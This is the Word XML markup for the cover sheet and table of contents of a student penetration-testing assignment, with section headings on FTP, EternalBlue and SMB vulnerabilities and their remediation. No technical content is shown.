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E7677" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="178" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="100" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F48C577" wp14:editId="35CC3D4C">
            <wp:extent cx="1562100" cy="156210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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1562100" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673B0E2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="226" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Security and Forensics – Cover Sheet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55BF77" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ASSIGNMENT (SECTION A) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C22C4B" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419E90BD" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF6317A" w14:textId="1D4D7373" w:rsidR="00F5636D" w:rsidRPr="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5636D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF08245" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8D1D03" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8745EE" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688227A3" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECEACDF" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F16823F" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3054C542" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566DEEBC" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AF5EB7" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC25CA2" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028DE12C" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD44A6C" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1977F93B" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62761AFD" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D" w:rsidP="00F5636D">
      <w:pPr>
        <w:spacing w:after="225" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1688021042"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5E81742F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:color w:val="0F4761"/>
              <w:sz w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve">Table of Contents </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="27532AE5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc23314">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Workload Matrix</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23314 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CA16012" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23315">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23315 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15EF53F4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23316">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.0 Vulnerability Scanning Strategy &amp; Tool Justification</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23316 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="258869AE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23318">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.1.1 Technical Steps &amp; Screenshots</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23318 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D4AFF64" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23319">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.1.2 Selected Critical Vulnerability: Anonymous FTP Access</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23319 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41348E99" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23320">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.1.3 Corrective and Preventive Measures</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23320 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">11 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="363E9B3D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23322">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.2.1 Technical Steps &amp; Screenshots</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23322 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">12 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AD63553" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23323">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.2.2 Selected Critical Vulnerability: MS17-010 (EternalBlue)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23323 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26C8738A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23324">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.2.3 Corrective and Preventive Measures</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23324 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D51BC87" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23326">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.3.1 Technical Steps &amp; Screenshots</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23326 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">19 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33BA5319" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23327">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.3.2 Selected Critical Vulnerability: SMB Enumeration</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23327 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">23 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E12A793" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23328">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.3.3 Corrective and Preventive Measures</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23328 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">24 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07EE0AB5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23330">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.4.1 Technical Steps &amp; Screenshots</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23330 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">25 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="521D894F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23331">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.4.2 Selected Critical Vulnerability: Weak SMB Authentication</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23331 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">29 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52298772" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23332">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>2.4.3 Corrective and Preventive Measures</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23332 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">30 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E3E01E6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23333">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>3.0 Conclusion</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23333 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">31 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BDB9418" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9520"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc23334">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc23334 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">32 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41CD37C2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="78E0DB8C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="337" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65539466" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C8DA8" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D753BBC" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6FCB53" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F848271" w14:textId="77777777" w:rsidR="00F5636D" w:rsidRDefault="00F5636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527107B6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
